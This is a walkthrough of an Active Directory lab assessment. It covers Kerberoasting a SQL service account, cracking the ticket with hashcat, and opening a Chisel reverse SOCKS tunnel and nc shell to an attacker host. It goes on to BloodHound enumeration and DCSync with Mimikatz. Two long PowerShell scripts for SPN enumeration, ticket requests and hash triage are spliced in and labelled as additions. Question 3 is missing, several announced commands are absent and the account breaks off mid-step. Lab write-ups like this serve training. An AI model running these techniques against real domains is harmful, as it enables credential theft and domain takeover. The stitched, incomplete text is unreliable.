AD Enumeration & Attacks - Skills Assessment Part I
We start with the credentials the assessment hands us ('admin:My_W3bsH3ll_P@ssw0rd!'), which give us a foothold in the /uploads directory of the web server.
Apart from that starting point, this write-up does not reveal any credentials (cracked passwords and flags are redacted). All the commands are provided with explanations; you need to execute them on your own.
Questions and response
1-Submit the contents of the flag.txt file on the administrator Desktop of the web server
First, I perform a simple enumeration by listing the local users on the target host:
PS> net user
result:
Administrator    DefaultAccount    Guest
WDAGUtilityAccount
I also want to determine the hostname of the target machine:
PS> hostname
WEB-WIN01
Get information about the system and the domain name:
PS> systeminfo
Host Name: WEB-WIN01
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00430-10710-91142-AA408
Original Install Date: 3/30/2022, 2:27:04 AM
System Boot Time: 3/16/2024, 5:05:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,160 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,388 MB
Virtual Memory: In Use: 1,043 MB
Page File Location(s): C:\pagefile.sys
Domain: INLANEFREIGHT.LOCAL
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB4578966
[02]: KB4464455
Network Card(s): 2 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.197.134
[02]: fe80::4cec:af88:cdc7:54bd
[03]: dead:beef::4cec:af88:cdc7:54bd
[04]: dead:beef::1fe
[02]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet1
DHCP Enabled: No
IP address(es)
[01]: 172.16.6.100
[02]: fe80::adb5:8ffa:2424:3d64
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Get information about the domain and its domain controllers (note the DC name and IP, we need them later):
PS>[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
Forest : INLANEFREIGHT.LOCAL
CurrentTime : 3/17/2024 2:20:08 AM
HighestCommittedUsn : 65655
OSVersion : Windows Server 2019 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : INLANEFREIGHT.LOCAL
IPAddress : 172.16.6.3
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : DC01.INLANEFREIGHT.LOCAL
Partitions : {DC=INLANEFREIGHT,DC=LOCAL, CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL,
DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL...}
2-Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
So first we need to enumerate the accounts that have an SPN set, with the following command:
After requesting a service ticket for the target SPN, the TGS is cached in memory; you can confirm this with 'klist'. Now we need to extract it. I first attempted this with Mimikatz:
c:\mimikatz.exe "kerberos::list /export" exit
That didn't work, so I switched to Rubeus, which did.
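As an added example (my own PowerShell, not part of the original write-up), here is the SPN enumeration and the ticket request done without Rubeus or Mimikatz, using an ADSI DirectorySearcher and the .NET KerberosRequestorSecurityToken class. It assumes you run it on a domain-joined host such as WEB-WIN01 in a domain user context; the domain and the SPN are the ones from the assessment. Extracting the cached ticket into hashcat format still needs Rubeus (its kerberoast action does the request and the extraction in one step) or the Mimikatz export shown above.

```powershell
# Added example (not from the original write-up): enumerate SPN-bearing user
# accounts with ADSI, then request a TGS for the target SPN so it lands in the
# ticket cache. Run from a domain-joined host (e.g. WEB-WIN01) as a domain user.
$TargetSpn = 'MSSQLSvc/SQL01.inlanefreight.local:1433'

# 1. Find user accounts with at least one SPN set (the Kerberoastable candidates).
#    krbtgt is excluded: its ticket is not crackable in any useful time.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]'LDAP://DC=INLANEFREIGHT,DC=LOCAL'
$searcher.Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(samAccountName=krbtgt)))'
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.AddRange(@('samAccountName', 'servicePrincipalName', 'msDS-SupportedEncryptionTypes'))

$spnAccounts = foreach ($r in $searcher.FindAll()) {
    [pscustomobject]@{
        Account  = [string]$r.Properties['samaccountname'][0]
        SPNs     = @($r.Properties['serviceprincipalname'])
        # 0 / not set means the account only has RC4 (etype 23) keys, the easy case;
        # 24 or 28 means AES keys exist and the KDC may hand out an AES ticket.
        EncTypes = if ($r.Properties['msds-supportedencryptiontypes'].Count) {
                       [int]$r.Properties['msds-supportedencryptiontypes'][0]
                   } else { 0 }
    }
}
$spnAccounts | Select-Object Account, EncTypes, @{ n = 'SPNs'; e = { $_.SPNs -join ', ' } } | Format-Table -AutoSize

# 2. Which account owns the SPN the question asks about?
$owner = $spnAccounts | Where-Object { $_.SPNs -contains $TargetSpn }
"Account holding $TargetSpn : $($owner.Account)"

# 3. Request a service ticket for that SPN. The KDC encrypts the ticket with the
#    service account's key, which is what gets cracked offline. The ticket is
#    cached in the current logon session, so klist shows it afterwards.
Add-Type -AssemblyName System.IdentityModel
$null = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $TargetSpn

# 4. Confirm it is cached and note the encryption type klist reports for it.
klist | Select-String -SimpleMatch $TargetSpn -Context 0, 3
```

The klist context lines are worth reading before you start cracking: "KerbTicket Encryption Type" tells you whether you got an RC4 ticket (hashcat mode 13100) or an AES one, which needs a different mode and cracks far more slowly.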
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400F, 2639/5342 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433@INLANEFREIGHT.LOCAL*$216c085da9fc106eae92301453a63062$9d816b1ef670f3ae7753d19ce01a433b28fc14c8d8a6e04daa102374a4###":####
Don't bother trying to crack the other TGS tickets; it won't work xD.
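One caveat worth knowing before you spend hours on the other exports: hashcat -m 13100 only accepts etype 23 (RC4-HMAC) tickets. Tickets that come back AES-encrypted (etype 17/18) need modes 19600/19700 and are much slower, and a strong password will not fall to rockyou.txt in any mode. As an added example (my own PowerShell, not from the write-up), this triages a Rubeus or Mimikatz export by etype and writes one input file per hashcat mode. The sample lines are constructed: the RC4 one is the write-up's svc_sql line with its payload truncated, the AES one is invented, so neither will actually crack.

```powershell
# Added example (not from the original write-up): sort Kerberoast hash lines by
# encryption type and emit one hashcat input file per mode.
# Mode map is hashcat's: 13100 = etype 23 (RC4), 19600 = etype 17, 19700 = etype 18.
$Modes = @{ 23 = 13100; 17 = 19600; 18 = 19700 }

function Get-KerberoastInfo {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -notmatch '^\$krb5tgs\$(?<etype>\d+)\$') { continue }
        $etype = [int]$Matches.etype
        $user = $spn = $null
        # etype 23 layout:    $krb5tgs$23$*user$REALM$spn*$checksum$edata2
        # etype 17/18 layout: $krb5tgs$18$user$REALM$*spn*$checksum$edata2 (Rubeus)
        #                     or without the *spn*$ part (hashcat's canonical form)
        if ($etype -eq 23 -and $line -match '^\$krb5tgs\$23\$\*(?<user>[^$]+)\$(?<realm>[^$]+)\$(?<spn>[^*]+)\*\$') {
            $user = $Matches.user; $spn = $Matches.spn
        } elseif ($line -match '^\$krb5tgs\$1[78]\$(?<user>[^$]+)\$(?<realm>[^$]+)\$(?:\*(?<spn>[^*]+)\*\$)?') {
            $user = $Matches.user; $spn = $Matches.spn
        }
        [pscustomobject]@{
            Account     = $user
            SPN         = $spn
            EType       = $etype
            HashcatMode = if ($Modes.ContainsKey($etype)) { $Modes[$etype] } else { $null }
            Line        = $line
        }
    }
}

# Constructed sample input: one RC4 ticket and one AES-256 ticket, payloads shortened.
$sample = @(
    '$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433@INLANEFREIGHT.LOCAL*$216c085da9fc106eae92301453a63062$9d816b1ef670f3ae7753d19ce01a433b'
    '$krb5tgs$18$svc_other$INLANEFREIGHT.LOCAL$*HTTP/web.inlanefreight.local@INLANEFREIGHT.LOCAL*$0123456789abcdef0123456789abcdef$fedcba9876543210'
)
# For a real run replace $sample with: Get-Content .\hash.txt
$tickets = Get-KerberoastInfo -Lines $sample
$tickets | Format-Table Account, SPN, EType, HashcatMode -AutoSize

# One file per mode, plus the matching hashcat command line to run on Kali.
foreach ($group in $tickets | Where-Object HashcatMode | Group-Object HashcatMode) {
    $out = "hash_m$($group.Name).txt"
    $group.Group.Line | Set-Content -Path $out
    "hashcat -m $($group.Name) $out /usr/share/wordlists/rockyou.txt"
}
# Lines whose etype is not 17/18/23 get HashcatMode = $null and are skipped.
```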
4-Submit the contents of the flag.txt file on the Administrator desktop on MS01
I first use ping to test connectivity, verify that MS01 is reachable and determine its IP address:
PS> ping MS01
Pinging MS01.INLANEFREIGHT.LOCAL [172.16.6.50] with 32 bytes of data:
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Reply from 172.16.6.50: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.6.50:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Let's use the credentials of the SPN account we found.
Now let's use nc.exe on WEB-WIN01 to establish a stable shell, and I will run Chisel on it as a proxy so that requests from my Kali machine are forwarded into the internal domain network. You can achieve this with the following commands (the client must connect to the same port the server listens on; with R:socks the SOCKS5 listener opens on the Kali side at 127.0.0.1:1080 by default, which is what proxychains should point at):
chisel server -p 8000 --reverse   # on the Kali side
c:\chisel.exe client 10.10.15.79:8000 R:socks   # on the target side
Then I use CrackMapExec with the credentials of the user 'svc_sql' against the IP address of MS01:
But all I got back was a blank password. So I extracted that user's Kerberos ticket and attempted to crack it, but it didn't work despite several methods. I even attempted to crack the NT hash, but that failed too. After further research I discovered that I needed to enable WDigest; for details, check the post I linked. Here's the command:
Next I move on to BloodHound. First I downloaded SharpHound onto MS01 using Evil-WinRM, then executed it with the following command:
SharpHound.exe -c All --zipfilename enum
Then I copied the zip file to my Kali machine and loaded it into the BloodHound GUI. Here's what I found:
So the answer is DCSync.
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
So our compromised user 'TPETTY' can perform DCSync against the domain controller. Now we just need the IP address of the DC, which we gathered in the first question (DC01, 172.16.6.3). In my case I attempted this with Mimikatz, but first I need to authenticate as that user.
This took me a long time because I didn't pay attention to something very important. I hope you'll discover it; if not, don't worry, I recommend you read this. First, I download Mimikatz onto the target machine using Evil-WinRM and then execute it to dump any credentials in memory.